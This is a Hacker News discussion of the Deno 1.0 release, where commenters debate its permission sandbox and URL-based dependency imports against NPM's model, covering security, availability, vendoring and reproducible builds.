Hacker News new | past | comments | ask | show | jobs | submit login
Deno 1.0 (deno.land)
2081 points by theBashShell 20 days ago | hide | past | web | favorite | 583 comments



> ... Deno is (and always will be) a single executable file. Like a web browser, it knows how to fetch external code. In Deno, a single file can define arbitrarily complex behavior without any other tooling.

> ...

> Also like browsers, code is executed in a secure sandbox by default. Scripts cannot access the hard drive, open network connections, or make any other potentially malicious actions without permission. The browser provides APIs for accessing cameras and microphones, but users must first give permission. Deno provides analogous behaviour in the terminal. The above example will fail unless the --allow-net command-line flag is provided.

The Deno feature that seems to draw the most fire is dependency management. Some skeptics may be latching onto the first point without deeply considering the second.

Deno is just doing the same thing a browser does. Like a browser, there's nothing that JavaScript running on sandboxed Deno can do that a browser can't - in principle. So the security concerns seem a little over the top.

The one caveat is that once you open the sandbox on Deno, it appears you open it for all modules. But then again, that's what NPM users do all the time - by default.

As far as criticisms around module orchestration, ES modules take care of that as well. The dependency graph forms from local information without any extra file calling the shots.

This seems like an experiment worth trying at least.


See the thing about the sandbox is that it's only going to be effective for very simple programs.

If you're building a real world application, especially a server application like in the example, you're probably going to want to listen on the network, do some db access and write logs.

For that you'd have to open up network and file access pretty much right off the bat. That combined with the 'download random code from any url and run it immediately', means it's going to be much less secure than the already not-that-secure NPM ecosystem.


> That combined with the 'download random code from any url

What protection does NPM actually give you?

Sure, they'll remove malware as they find it, but it is so trivially easy to publish packages and updates to NPM, there effectively is no security difference between an NPM module and a random URL. If you wouldn't feel comfortable cloning and executing random Github projects, then you shouldn't feel comfortable installing random NPM modules.

> and run it immediately

NPM packages also do this -- they can have install scripts that run as the current user, and have network access that can allows them to fetch, compile, and execute random binaries off the Internet.

From a security point of view, Deno is just making it clear up-front that you are downloading random code snippets, so that programmers are less likely to make the mistake of trusting a largely unmoderated package repository to protect themselves from malware.

I lean towards calling that a reasonably big security win on its own, even without the other sandboxing features.


> What protection does NPM actually give you?

Dependency version pinning comes to mind. The main difference between this and a random URL is that at least you know that if the module gets bought by a third party, your services or build system won't auto update to some rando's version of the package. IIRC there have been cases when a version was replaced as well.

I think this could be fixed quite easily if one could add a hash and a size after the url, to force a check.


I was curious about this so I looked into it. Seems like deno allows for lock files (similar to package-lock.json for NPM) https://deno.land/manual/linking_to_external_code/integrity_...


Yeah, basically sounds like they could implement it à la Content Security Policy in the browser and it would be well understood right off the bat.

Or similar to node_modules, have some way to pull your dependency graph & host locally — At least for enterprise-y adoption I imagine that people will want to have _their_ copy of the code and choose when to update it even if in theory the remote code is locked down.


That is what I figured too. People are rightly concerned about the security implications of this new paradigm of including package dependencies.

These concerns and the conversation around them are good and healthy. Give it some time. People will experiment with what works and over time best practices will emerge for the set of trade offs that people are willing to make.


Arguably you can get (even more reliable) version pinning by copying typescript from that random URL & storing it in your own S3 bucket. Sure, you have _some_ work to do, but it's not that much and you 100% control the code from there on.


Well, I suppose they do (or will) provide a self hosted version of the registry. Like npm does.


If you publish your module versions on IPFS that would provide a guarantee to your users the module versions do not change once published. But hashes are not very memorable as module names.


> If you publish your module versions on IPFS...

Well, using message digests, NPM or Yarn can pretty much guarantee content addressable versions, too. Do not have to use IPFS or blockchains, just because...


A single source of trust for the dependancy transport.


> That combined with the 'download random code from any url and run it immediately', means it's going to be much less secure than the already not-that-secure NPM ecosystem.

What deno does is move package management away from the framework distribution. This is great - one thing I hate about node is that npm is default and you get only as much security as npm gives you. (You can switch the npm repo, but it's still the overwhelming favourite because it's officially bundled.)

Deno can eventually give you:

  import lib from 'verified-secure-packages.com'
  import lib from 'packages.cloudflare.com'
So you'll be able to pick a snippet repository based on your risk appetite.


But if Lib itself imports from "unsecure-location.com" deno will access that location and get that file.


The idea of the above example is to show a controlled distribution can be made that would verify all levels of imports if needed, which is very promising.


Both the network and disk access permissions are granular, which means you can allow-write only to your logs folder, and allow net access only to your DB's address.


So it's reimplemented chmod and iptables?


Typically, chmod and iptables are not used to restrict applications. Applications are restricted by virtual machines, containers, sandboxes, AppArmor profiles, SELinux policies…


There's a fairly long history of giving applications their own uid to run under which puts chmod and chown in control of filesystem operations the app is allowed to perform. "Typically" maybe not, but it's hardly unusual.

iptables + namespaces gives you the rest.


+ you can make a network namespace and have separate iptables just for that namespace/app, you can for example give the namespace/app a VPN connection without affecting the rest of the system. And other apps can join the namespace and communicate as if they had their own isolated network.

NodeJS is also working on policies (1) which allows you to change permission to single modules or files.

1) https://nodejs.org/api/policy.html


chmod/chown has been the de facto (if not de jure) method securing LAMP stacks for as long as I have been alive. Not that I recommend taking the advice of a LAMP stack too seriously :)


If the de facto method refers to "chmod 777", I wouldn't call that securing ;-)

But indeed, if there is a separate user account for the application, then chmod can be used for some control to its access to files and directories.


A bit more like OpenBSD pledge() and unveil()


> For that you'd have to open up network and file access pretty much right off the bat.

For the network access I have an issue[0] open that asks to separate permissions to listen on the network from permission to dial. Also, along the way I want to have the ability to let the OS pick the port as an option.

Permissions are meant to work by whitelisting. So you wouldn't open access to the whole system just to talk to your DB, or to operate on some files.

[0] https://github.com/denoland/deno/issues/2705


Maybe this will develop into a standard of multi-process servers (real micro services you could say), where the permissions are only given to a slice of the application.


Sounds like privilege separation[1].

[1] https://en.wikipedia.org/wiki/Privilege_separation


That sounds like the Postfix architecture [1]

[1]: https://www.akadia.com/services/postfix_mta.html


Reinventing QNX will always be cutting edge.


QNX is hands down amazing! No car manufacturer could ever come close to having their in-house infotainment system being as snappy as QNX...which is why they gave up and switched to QNX! Fine print: Tesla not included.


Now that would indeed be an interesting way of building servers.


Sometimes it's ok to think "this project isn't for me" and just leave it be. The cynical-security-concern act is boring.


Contrary to the impression I seem to have given you, I'm actually super excited about Deno and am planning to write my next MVP app in it.

That means that I am actually a lot more vested into it, and if I want to put it in production, then I have to be concerned about things like this.

When somebody says they think X is broken, and they present a solution Y which they say is better, I am definitely entitled to ask why they think Y is better when I can't see the difference.


But you don't seem to be genuinely seeking answers, at least not in this thread. Does seem you're already convinced of the projects faults.

You're entitled to your opinion, of course. I had to read through the docs to understand their module system and intent. And I find it very exciting.


Security is literally the main selling point of this thing. Otherwise just use node.


It’s one of the selling points. One of the main points I took away was

” We feel that the landscape of JavaScript and the surrounding software infrastructure has changed enough that it was worthwhile to simplify. We seek a fun and productive scripting environment that can be used for a wide range of tasks.”

Sounds intriguing to me. As a fan of starting projects of as simply as possible, I will certainly be tinkering with Deno.


There are a lot selling points. To me, the main one is typescript with no build.


  yarn global add ts-node prettier
  echo 'alias deno="ts-node"' >> ~/.zshrc
  echo 'alias deno-fmt="prettier --write"' >> ~/.zshrc
Deno provides a standard library, good defaults, top-level async-await, doesn't break browser compatibility, better API to integrate with runtime.

Internals are nicer but that's with anything without ugly legacy.

They are working to get node_modules work in deno so I am kind of worried that it will be nodev2 all over.


Clearly they have never dealt with JavaScript build tools and npm. A complete nightmare.


Who hasn't? Isn't this precisely one of the pros of Deno?


Yes. That's why I said that.


Promise-based APIs sold me.


Strawman security questions without an understanding of the tool are not very useful.


For the use-case you describe, your just going to need network access: no file access and no process-forking needed, this is a big surface attack reduction.

Moreover Idk how granular the network permission is, but if its implementation is smart, you could block almost all outbound network access except the ones to your DB and the few API you may need to contact.


> means it's going to be much less secure than the already not-that-secure NPM ecosystem.

I have only the bare minimum of like, experience with nodejs. Would you mind fleshing out why that is so?


> For that you'd have to open up network and file access pretty much right off the bat.

I think that overall you're right, but it's worth noting that deno can restrict file system access to specific folders and can restrict read and write separately. It's plausible to me that you could have a web server that can only access specific folders.


I don't think running a public web server application is one of the envisioned use cases here. It looks like a tool for quickly and dirtily getting some job done. But I agree that to get something useful done, you probably need to open up a bunch of permissions, so you're still running arbitrary code on your machine.


It's always a good idea to run in a container, which limits the ports you can listen on, directories allowed for writing and reading, and can have its own firewall to limit outgoing connections.

If you don't need the firewall, you can just run in a chroot under a low-privilege user.

I mean, if you do otherwise, you are not following best practices and the voice of reason.


The manual looks pretty sketchy, but it seems you can limit file access to certain files or directories and that could be used to just give it access to the database and log files.


Looking at the flags, one can envision future updates providing flags for scoping to directories, PIDs, domain/IP ranges


I don't think thats very accurate. You really need to gi watch the first Deno video made by Ryan Dahl at JSConf.


If I am building a real world application I'm going to vet the libraries I use.


Simple solution to the dependency management (spitballing): a directory of files where the filename is the module name. Each file is simply:

  <url><newline><size in bytes><newline><hash>
And then in an application:

  import { serve } from deno.http.server;
If you want nested levels so deno.X.X wouldn't be a ton of files you could possibly just do nested directories so deno/http/server would equate to deno.http.server.

Most people would want the option to do dependency management on a per-project basis as well. Simply allow a command-line parameter to provide one or more other directories to source from first (besides presumably the global one for your installation).

If we wanted the file to be generated automatically, maybe something like this:

  import { serve } from deno.http.server at "https://deno.land/std@0.50.0/http/server.ts";


Until someone thinks that it should follow redirects which probably leads to the same thing that got apt: https://justi.cz/security/2019/01/22/apt-rce.html

Not saying that makes it a bad idea, but importing/downloading trusted code over http(s) is not simple even if the protocol sorta is.


> This seems like an experiment worth trying at least.

Yup! I am really excited about Deno and curious about how popular it will be in a few years.


I guess I'm wondering why Deno is targeting V8 instead of Servo? Maybe I'm mistaken, but Servo [0] and Stylo [1] are both production-ready browser scripting and styling engines implemented in Rust.

[0] https://servo.org/

[1] https://wiki.mozilla.org/Quantum/Stylo


>Servo [0] and Stylo [1] are both production-ready browser scripting and styling engines implemented in Rust.

Servo is absolutely not production ready. A couple of particular pieces of Servo, such as Stylo and WebRender, can be considered production-ready, but no so much the project as a whole.


Servo uses Firefox's SpiderMonkey, which is written in C++, as its JavaScript implementation.


Servo is an experimental project designed to build and test components that can be integrated into Firefox. It relies on Gecko for JS.


SpiderMonkey, not Gecko.


If you're getting into Deno and want to keep up with new stuff from the ecosystem on a regular basis, we're now publishing https://denoweekly.com/ .. issue 2 just went out minutes after the 1.0 release. I've been doing JavaScript Weekly for 487 issues now, so this is not a flash in the pan or anything :-D

Of course, Deno has an official Twitter account as well at https://twitter.com/deno_land :-)


I suppose .land is the new .dev now ;)

Am curious how Parallelism could be handled in the runtime? Besides exposing WebWorkers, would shared memory be a possibility? V8 looks like its heading toward a portable WebAssembly SIMD accelerator.

>>> Promises all the way down

Async / await is a great pattern for render loops by resolving to continuous window.requestAnimationFrame calls. Here is a nifty example computing a Buddhabrot and updating new data quite smoothly:

http://www.albertlobo.com/fractals/async-await-requestanimat...


Root certificate not trusted for https://denoweekly.com/ on both chrome and firefox.


Maybe they fixed this in the last 2 hours, but it works for me (firefox, linux).


Weird, it still says that "Cisco Umbrella Root CA" is not trusted. Maybe its only from certain countries.


I'm Canadian and in Canada for what it's worth. Clicking on the lock tells me that it was verified by lets encrypt. The root is "Digital Signature Trust Co." Common Name "DST Root CA X3".

Cisco sounds like a router might by running a MITM on you?

Edit: This looks to be confirmation that that root (or one by a very similar name) is used by a MITM tool:

https://docs.umbrella.com/deployment-umbrella/docs/rebrand-c...


Thanks for the diagnosis. Accessed from a different network and with no issues. And got the right certificate this time.


Same. FF/macOS


Hmm, interesting! Thanks for the report. I just ran it through Qualys SSL Labs and everything passed. (We got a B though because we still support TLS 1.1.)

It's a multi-domain Let's Encrypt X3 certificate and I believe most LE users will be in a similar boat now.


Keep up the good work, JS weekly is a wonderful resource.


Good to see you here!


right on top of it Peter! nice


Great :)


> TSC must be ported to Rust. If you're interested in collaborating on this problem, please get in touch.

This is a massive undertaking. TSC is a moving target. I occasionally contribute to it. It’s a fairly complex project. Even the checker + binder (which is the core of TS) is pretty complex.

One idea that comes to mind is to work with Typescript team that they are only using a subset of JS such that tsc can be compiled down web assembly and have llvm spit out a highly optimized binary. This not only benefits demo, but the rest of the internet.

TSC has done some great architectural changes in the past like doing mostly functional code, rather than lots of classes.

The target we should be aiming for is a powerful typed language like typescript that complies very quickly to webasshmbly that can run in guaranteed sandbox environments.


There already exists and experimental compiler that takes a subset of TypeScript and compiles it to native[1]. It might be able to target wasm instead of asm.

Also: If I'm not entirely mistaken Microsoft initially planned to have a TypeScript-specific interpreter in Explorer. This also might indicate that something like that could be possible.

1: https://www.microsoft.com/en-us/research/publication/static-...


I wonder how possible it would be to just use this:

https://github.com/swc-project/swc

It's still not feature-complete, but there aren't any alternatives written in Rust that I know of.


SWC does not do any typechecking. It is equivalent to babel.



This does seem like a dangerous side-path unrelated to the Deno project's needs.

From the description, it doesn't sound like Deno needs the type information for V8 optimizations (I thought they had explored that, but I don't recall, and the description here is unclear), so maybe switching to more of a two pass system of a simple as possible "type stripper" (like Babel's perhaps?) and leave tsc compilation for type checking as a separate background process. Maybe behind some sort of "production mode" flag so that type errors stop debug runs but in production assume you can strip types without waiting for a full compile?

Maybe even writing a type stripper in Rust isn't a bad idea, but definitely trying to capture all of tsc's functionality in Rust seems like a fool's errand.


Typescript already has transpile-only mode that lets it run without performing those checks and just emit.

I use it with ts-node all the time for my docker images that require fast startup.

node -r ts-node/register/transpile-only xyz.ts


v8 has the ability to snapshot a program just after it loads, but before it executes. If you snapshot after doing some kind of warmup, to trigger the right optimisations, you get something that should fire up ready to go, which is probably the main problem - the compiler being repeatedly invoked and parsed from javascript and compiled on the fly.


One problem with taking the v8 snapshot and using it as a binary executable is that it will probably be much slower then running v8 live. Although the startup time will be 10x faster. The runtime will be 10x slower.


The notes here mention that V8 snapshots also didn't provide the speed-up/optimization Deno was hoping for.


There is https://github.com/AssemblyScript/assemblyscript. It's not using llvm, but it's compiling a subset of typescript to webassembly.


I see the sass / node-sass fiasco all over again...


This is referring to lib-sass being in C?


The dependency management is highly questionable for me. Apart from the security concerns raised by others, I have huge concerns about availability.

In it's current form, I'd never run Deno on production, because dependencies have to be loaded remotely. I understand they are fetched once and cached, but that will not help me if I'm spinning up additional servers on demand. What if the website of one of the packages I depend on goes down, just as I have a huge spike in traffic?

Say what you want about Node's dependency management, but atleast I'm guaranteed reproducible builds, and the only SPOF is the NPM repositories, which I can easily get around by using one of the proxies.


Why can't you download all the packages you use actually with your source code? That's how software has been built for decades...

I'm a desktop developer so I understand I'm the dinosaur in the room but I've never understood why you would not cache all the component packages next to your own source code.

Since this is straighforward to do I presume there is some tradeoff I've not thought about. Is it security? Do you want to get the latest packages automatically? But isn't that a security risk as well, as not all changes are improvements?


For Node, the main tradeoff is number and size of files. Usually the distribution of a node module (that which is downloaded into node_modules) contains the source, documentation, distribution, tests, etc. In my current project, it adds up to 500MB already.

They would do well to have an option to optimize dependencies for vendoring.


You're right. We call this "vendoring" your dependencies. And it's a good way to do things.


You can commit your node_modules folder into your repository if you'd like.


That is exactly what NPM does.


So build your own npm?


Hi! The response to your fears are in the announcement. "If you want to download dependencies alongside project code instead of using a global cache, use the $DENO_DIR env variable." Then, it will work like node_modules.


Ah, in this case, I would then have to commit my dependencies into my VCS to maintain reproducible builds. I'm not sure I like that solution very much either. I've seen node_modules in multiple GBs, and I'm sure Deno's dependency sizes are going to be similar.


True, but that's what people using Go have been doing for years without complaining much, so I guess it works fine for most workload.

And before npm fixed things after the left-pad incident, the npm builds where not reproducible either (as demonstrated by the said left-pad incident).


> True, but that's what people using Go have been doing for years without complaining much, so I guess it works fine for most workload.

I hate to break it to you but dependency management has been a massive issue in golang until the devs formally adopted go mod.

Only Google seemed okay with checking in their dependencies to version control. Everyone else was doing crazy hacks like https://labix.org/gopkg.in


Checking in dependencies to version control is the sane option. Then you can more easily see what's updated and track regressions. Some people like to refactor their code any time there is a syntax sugar added to the language - often adding a few bugs while doing it, which is a PITA, but version control is still better then no version control.

You will ask, what about adding the OS to your SCM too, yeh why not have the full software stack. But you can generally draw a line between strong abstraction layers: Hardware | Kernel | OS | runtime | your app. Some modules do have strong abstraction layers, but others are just pure functions which you could just as well copy into your own repo.


It created a hugely fractured open source ecosystem as well.


The vendoring has never been the issue though.


I have only used Go once at work, and I actually dislike most of it (and dependency management was one of the annoying things with Go), nonetheless it is has never been a show stopper and there have been thousands of developers using it when vendoring was the only option.


Dependency management is one of the biggest complaints I have seen around Go - I don't think this is accurate.


I don't like it either, but it still works well enough for many people.


Go dependency management is quite good now with "go mod", plus your dependency tree isn't going to look anything like your typical JavaScript dependencies, otherwise you're doing it wrong..


> that's what people using Go have been doing for years without complaining

I haven't seen anyone commit vendor and not complain about it. But now you finally don't have to commit vendor for reproducible builds. All you need is a module proxy. The "all you need" is not really meant seriously of course.

And I personally prefer to not commit vendor and complain about it.


Go compiles to a static binary. It’s not downloading and running source on your production servers. Isn’t that the concern here?


That is one of the things I hate about go. Right up there with lack of generics and boilerplate error handling.


This hasn't been a thing in Go for a long time. Go dep and now go modules fix this.


You could use a separate git repository for the dependencies. That way you keep your core project repo tight and small and clean, but you still have your dependencies under version control. If that separate repo grows to a few GBs or more it doesn't really hurt anything.


In practice modules will be available from sources that will have similar reliability to npm: github.com, unpkg.com, cdn.pika.dev, jspm.io, etc.


Which then raises the question - how is it better than NPM? If there are going to be centralized repositories (like NPM), and if I have to download my dependencies into a $DENO_DIR (like NPM), and if I am then loading these dependencies from local files (like NPM), how is it any different to NPM? Except for being less secure by default?

This is starting to look like a case of being different just so you can say you're different.


NPM is a dependency management failure which is why you are ending up with hundreds of dependencies in the first place. It sounds like you want to reproduce that insanity in Deno. Deno is set up in such a way to dissuade you from the stupidity by default but allow it in very few steps if you cannot imagine a world without it.

In my opinion this is Deno’s biggest selling point.


> Deno is set up in such a way to dissuade you from the stupidity by default but allow it in very few steps if you cannot imagine a world without it.

Could you elaborate on this? Is it that Deno is against the whole 'small packages that do one thing well' principle and instead in favor of complete libaries? How exactly would it dissuade me from installing hundreds of dependencies?


The default design style for a Deno application is that the application becomes a single file. Just like packages coming off Steam. This requires that dependencies are packaged into the application before it is distributed to others. The idea there is to include only what you need deliberately and it manage it as a remotely written extension of your application.


Having a single executable file, makes distribution easier, but while I'm developing the app, I'll still have to manage all of it's dependencies right? How does Deno aid during development?

> The idea there is to include only what you need deliberately and it manage it as a remotely written extension of your application.

I have a node app, in which I deliberately only included the dependencies I need. The package.json lists exactly 8 dependencies. However, the node_modules folder already has 97 dependencies installed into it. The reason of course is that these are dependencies of dependencies of dependencies of dependencies.

Wouldn't Deno have this same issue? Are the dependencies also distributed in compiled form as a single file akin to windows DLLs?


it's better because there will be more choice.


I am always confused by deno folks. You can install from a git repository using yarn/npm.

How is that not "decentralisation"

And if you are importing single files from a remote url, I would question your sanity.


> install from a git repository using yarn/npm

yep, that's basically the same. deno has the benefit of using the es module system like it is implemented in browsers.


Node supports node_modules, not npm. Anything can build the node_modules.


Doesn't this mean more opportunities to inject malicious code?


Only if you tell your application to retrieve from untrusted locations.


To solve your issue, you would do exactly how you do your node deployments: download the deps in a folder in CI, then deploy the whole build.


Except that now, the download deps in CI step can fail if one of hundreds of websites for my hundreds of dependencies goes down. If the main NPM repository goes down, I can switch to a mirror and all of my dependencies will be available again.


To be the rubber duck, if wiping the cache at each build is a risk to your CI, what could you do to keep your CI up?

1 - not wipe the cache folder at each build? It's easy and secure. Oh and your build will be faster.

2 - use a cached mirror of the deps you use? It's like 10min to put in place and is already used in companies that care about security and availability anyway.

3 - you have https://deno.land/x if you want to put all your eggs in the same npm basket


Yes, I think I'd probably settle for solution number 2.

I still don't understand how this is better than NPM, and how Deno solves the horrible dependency management of Node, but maybe if I actually build something with Deno I'll get some answers.


From the post:

> [With NPM] the mechanism for linking to external libraries is fundamentally centralized through the NPM repository, which is not inline with the ideals of the web.


> which is not inline with the ideals of the web

Subjective.

> Centralized currency exchanges and arbitration is not in line with the ideals of the web! - Cryptocurrency

Nek minute. Besides, let's get real here; they will just end up centralized on GitHub. How exactly is that situation much different than npm or any other language ecosystems library directory being mirror-able?


The centralization of git on Github is completely different in nature from the centralization of Node packages on npm.

git does not require Github to be online to work, nor relies on Github existence for its functionality.


I'm talking about the centralization of software packages(Go, Deno) on GitHub as it applies to dependency resolution.


I'd highly recommend mirroring packages anyway. Obviously this isn't always necessary for small projects, but if you're building a product, the laws of the universe basically mandate that centralized package management will screw you over, usually at the worst possible time.


You answered your own question. Nothing stops you from using a mirror with deno too.


Which again brings me back to something I'm still not understanding - How is Deno's package management better than NPM if it is extremely similar to NPM, but slightly less secure?

I'm only asking because lots of people seem to be loving this new dependency management, so I'm pretty sure I'm missing something here.


We need to distinguish between npm, the service (https://www.npmjs.com/) and npm, the tool.

Deno has the functionality of npm, the tool, built-in.

The difference is that like Go, Deno imports the code directly from the source repository.

In practice it's going to be github.com (but can be gitlab or any code hosting that you, the author of Deno module, use).

NPM is a un-necessary layer that both Go and Deno has removed.

It's better because it's simpler for everyone involved.

In Go, I don't need to "publish" my library. People can just import the latest version or, if they want reproducibility, an explicit git revision. Compared to Go, publishing to npm is just unnecessary busy work.

I've seen JavaScript libraries where every other commit is related to publishing a new version to npm, littering the commit history.

In Go there's no need for package.json, which mostly replicates the information that was lost when publishing to npm (who's the author? what's the license? where's the actual source repository?).

As to this being insecure: we have over 10 years of experience in Go ecosystem that shows that in practice it works just fine.


How do you list the dependency libraries if you don't have a package.json?

Do you manually install a list of libraries provided by the author's readme?


The simplest approach is to either import anything anywhere, or have a local module that import external dependencies and then have your code import them via that local module.


The dependencies are imported in the source code of the package.


NPM, the tool, has had the feature to be able to install directly from GitHub instead of npmjs.org for many many years as well. No one really used it unless as a workaround for unpublished fixes because it has no other tangible benefits.


I like it because it's simpler. I know what happens when I import from a URL. I'd have a hard time whiteboarding exactly what happens when I `npm install`.


What happens?


My least favorite thing about importing from NPM is that I don't actually know what I'm importing. Sure, there might be a GitHub repository, but code is uploaded to NPM separately, and it is often minified. A malicious library owner could relatively easily inject some code before minifying, while still maintaining a clean-looking repo alongside the package.

Imports from URL would allow me to know exactly what I'm getting.


install from the repo then?

You can install a specific version from git via yarn/npm.

How do you trust a url more without reading the code?

What's going to stop deno ecosystem from putting minified js files on cdns and import them?


It's decentralized.


Or use something like Nexus or Artifactory to host a private copy of dependencies.


I think the primary way to manage dependencies should be in a local DIR and optionally, a URL can be specified.

The default in Deno is questionable choice. Just don't fuck with what works. Default should be safest followed by developers optionally enabling less safe behaviors.


Using a universally unique identifier like a URL is a good idea: this way, https://foo.com/foo and https://bar.com/foo are distinct and anyone who can register their own name gets a namespace, without relying on yet another centralized map of names->resources.

After all, the whole point of a URL is that it unambiguously identifies resources in a system-independent way.


No one is questioning the utility of URLs. Using URLs to specify dependencies right in the import statement is a horrible idea.


How is it any worse than using names from a namespace controlled by “npmjs.com”: if you’re concerned about build stability, you should be caching your deps on your build servers anyways.


I've never used npm or developed any javascript before but it sounds equally horrible.

Not decoupling the source of the package (i.e., the location of the repository whether it is on remote or local) and its usage in the language is a terrible idea.

  from foo import bar
  # foo should not be a URL. It should just be an identifier.
  # The location of the library should not be mangled up in the code base.

Are we gonna search replace URL strings in the entire codebase because the source changed? Can someone tell me what is the upside of this approach because I cannot see a single one but many downsides.


The whole idea of a URL is that it’s a standardized way of identifying resources in a universally unique fashion: if I call my utility library “utils”, I’m vulnerable to name collisions when my code is run in a context that puts someone else’s “utils” module ahead of mine on the search path. If my utility module is https://fwoar.co/utils then, as long as I control that domain, the import is unambiguous (especially if it includes a version or similar.).

The issue you bring up can be solved in several ways: for example, xml solves it by allowing you to define local aliases for a namespace in the document that’s being processed. Npm already sort of uses the package.json for this purpose: the main difference is that npmjs.com hosts a centralized registry of module names, rather than embedding the mapping of local aliases->url in the package.json


Allow me to provide an extremely relevant example (medium sized code base).

About 100 python files, each one approximately 500-1000 lines long.

Imagine in each one of these files, there are 10 unique imports. If they are URLs (with version encoded in the URL):

- How are you going to pin the dependencies? - How do you know 100 files are using the same exact version of the library? - How are you going to refactor dependency resolution or upgrades, maintenance, deprecation?

How will these problems be solved? Yes, I understand the benefits of the URL - its a unique identifier. You need an intermediate "look up" table to decouple the source from the codebase. That's usually requirements.txt, poetry.lock, pipenv.lock, etc.


I believe the long term solution to the issues you raised is import maps: https://github.com/WICG/import-maps

It's an upcoming feature on the browser standards track gaining a lot of traction (deno already supports it), and offers users a standardized way to maintain the decoupling that you mentioned, and allows users to refer to dependencies in the familiar bare identifier style that they're used to from node (i.e. `import * as _ from 'lodash'` instead of `import * as _ from 'https://www.npmjs.com/package/lodash'`).

I imagine tooling will emerge to help users manage & generate the import map for a project and install dependencies locally similar to how npm & yarn help users manage package-lock.json/yarn.lock and node_modules.


The Deno docs recommend creating a deps.ts file for your project (and it could be shared among multiple projects), which exports all your dependencies. Then in your application code, instead of importing from the long and unwieldy external URL, import everything from deps.ts, e.g.:

    // deps.ts
    export {
      assert,
      assertEquals,
      assertStrContains,
    } from "https://deno.land/std/testing/asserts.ts";

And then, in your application code:

    import { assertEquals, runTests, test } from "./deps.ts";
https://deno.land/manual/linking_to_external_code#it-seems-u...


This was my first instinct about how I'd go about this as well. I actually do something similar when working with node modules from npm.

Let's say I needed a `leftpad` lib from npm - it would be imported and re-exported from `./lib/leftpad.js` and my codebase would import leftpad from `./lib`, not by its npm package name. If / when a better (faster, more secure, whatever) lib named `padleft` appears I would just import the other one in `./lib/leftpad.js` and be done. If it had incompatible API (say, reversed order of arguments) I would wrap it in a function that accepts the original order and calls padleft with the arguments reversed so I wouldn't have to refactor imports and calls in multiple places across the project.


Yeah, this sort of "dependency injection" scheme is better than having random files depend on third party packages anyways: it centralizes your external dependencies and it makes it easier to run your browser code in node or vice-versa: just implement `lib-browser` and `lib-node` and then swap then out at startup.


Yeah, I agree, but that intermediate lookup table (a) can be in code and (b) can involve mapping local package names to url package names.

One off scripts would do `from https://example.com/package import bar` and bigger projects could define a translation table (e.g. in __init__.py or similar) that defines the translation table for the project.

Embedding this sort of metadata in the runtime environment has a lot of advantages too: it’s a lot easier to write scripts that query and report on the metadata if you can just say something like `import deps; print( deps.getversions(‘https://example.com/foo’)`

One of the best parts about web development is that, for quick POC-type code, I can include a script tag that points at unpkg.com or similar and just start using any arbitrary library.


That's exactly what Go does - it works fine


Good luck finding which of foo.com/foo or bar.com/foo is the foo module you want though…


Good luck finding which of google.com/search or bing.com/search is the search engine you want though


This is true actually, and that's why being the default search engine is so important Google pays billions each year for that.


It could be a good idea if they were immutable, like IPFS links.


That might work for some projects, but can quickly blow up the size of the repo.

I don't think it it is an unsolvable problem. For example, other solutions could be using a mirror proxy to get packages, instead of directly from the source, or pre-populating the deno dir from an artifact store. It would be nice to have documentation on how to do those though.


A better solution is something like https://vfsforgit.org/


That's not necessarily better. For one thing, it doesn't support Linux yet. For another, afaik, Azure DevOps is the only git hosting service that supports it.

Even if it was better supported, I wouldn't want to start using it just so I can include all my dependencies in git. Of course if you are using something like vfs for git anyway, then increasing the repo size is less of an issue. It still feels wrong to me though.


Yeah, I'm not really advocating the use of GVFS specifically, but what I am saying is that once you've lived in a world where all your dependencies are in your repo you won't want to go back, and that Git should improve their support for large repos (in addition to checking in all our dependencies, we should be able to check in all our static assets).


It's just a URL right? So could you not mirror the packages to your own server if you're so concerned, or better yet import from a local file? Nothing here seems to suggest that packages must be loaded from an external URL.


> or better yet import from a local file

And this is different from NPM how? Except that I've now lost all the tooling around NPM/Yarn.


It's different because it is much further removed from a centrally controlled dumpster fire. The JS, Node and NPM ecosystem is a pain on so many levels. Blindly trusting developers to follow semver by default. Leftpad. Build toolchains. The whole micro-depedency madness. Having a peek into your node_modules is like looking into the depths of hell.

Not saying Deno won't devolve into this sad state at some point. Maybe it already has. But it seems to try to combat some of the problems by being honest and pragmatic about dependencies, promoting minimal external tooling and removing some of the dangerous abstractions from NPM.

To me Deno seems like a desperately needed and well thought out reset button.

Semi-related rant over.


It's different because it doesn't rely on require() which is non-standard JavaScript.


Node v14 supports ESM modules and the import syntax, which is standard Javascript.


setTimeout is non-standard JavaScript too but I bet your code base has multiple instances of its usage.


Is it? It's on every browser I know.



Ah, makes sense, it's not part of the spec so it might be missing on other environments. Thank you.


Then you either vendor as others have said, or use the built in bundle tool to produce a single js file of all your code including dependencies.

https://deno.land/manual/tools/bundler


Several responses to your concern but all of them seem to say "you can cache dependencies". How does Deno find dependencies ahead of runtime? Does Deno not offer dynamic imports at all?

If I have an application that uses, say, moment.js and want to import a specific locale, typically this is done using a dynamic import.


You’d deploy builds that include all the dependencies. This isn’t Node where you have to download all deps on your production server, they are built into your deployed files.


Ever used Go? Not that different.


Go supports "vendor" folders for storing dependencies locally after initial download. That combined with Go Modules means you can handle everything locally and (I believe) reproducible.


deno has the same support with $DENO_DIR and a lockfile.


Reproducible builds, sure. Security? that's a different story.

https://github.com/ChALkeR/notes/blob/master/Gathering-weak-...

- node ships with npm

- npm has a high number of dependencies

- npm does not implement good practices around authentication.

Can someone compromise npm itself? probably, according to that article.


How is this different from requiring npm to be up to install packages?


I like what Deno is selling. URL like import path is great, I don't know why people are dismissing it. It is easy to get up-and-running quickly.

Looks like my personal law/rule is in effect again: The harsher HN critics are, the more successful the product will be. I have no doubt Deno will be successful.


Your law is hilarious. I tend to check the comments before reading a post: if they say the idea is terrible, I know I should read it.


The GoLang-like URL import and dependency management are indeed an innovation in simplicity while simultaneously offering better compatibility with browser JavaScript.

Perhaps the HN-hate is not about simplified greenfield tech as much as it is about breaking established brownfield processes and modules.


My concern is what happens when popular-library.io goes down or gets hacked?

Or how about attack vectors like DNS poisoning? or government-based firewalls?

I know there's this[1], but somehow I still feel uneasy because the web is so fragile and ephemeral...

At the very least I would like to have the standard library offline...

[1] https://github.com/denoland/deno/blob/master/docs/linking_to...


> what happens when popular-library.io goes down or gets hacked?

What is anyone going to do about it? Anything has a chance of getting hacked or goes down just when you need it, be it GitHub, npmjs.org...

Blaming the tool for not having a protection against DNS poisoning is a bit far fetched.


ultimately i guess it is about how/if deno caches its imports. with node.js/npm you have the exact same problems, just the source & sink occur at different places (package installation)


With Node.js you install the packages in a dev environment, and test extensively, then push all the code, including node_packages folder to production. Running npm on the prod server is forbidden. At least in theory =)


You can always download the scripts and host them yourself, right?


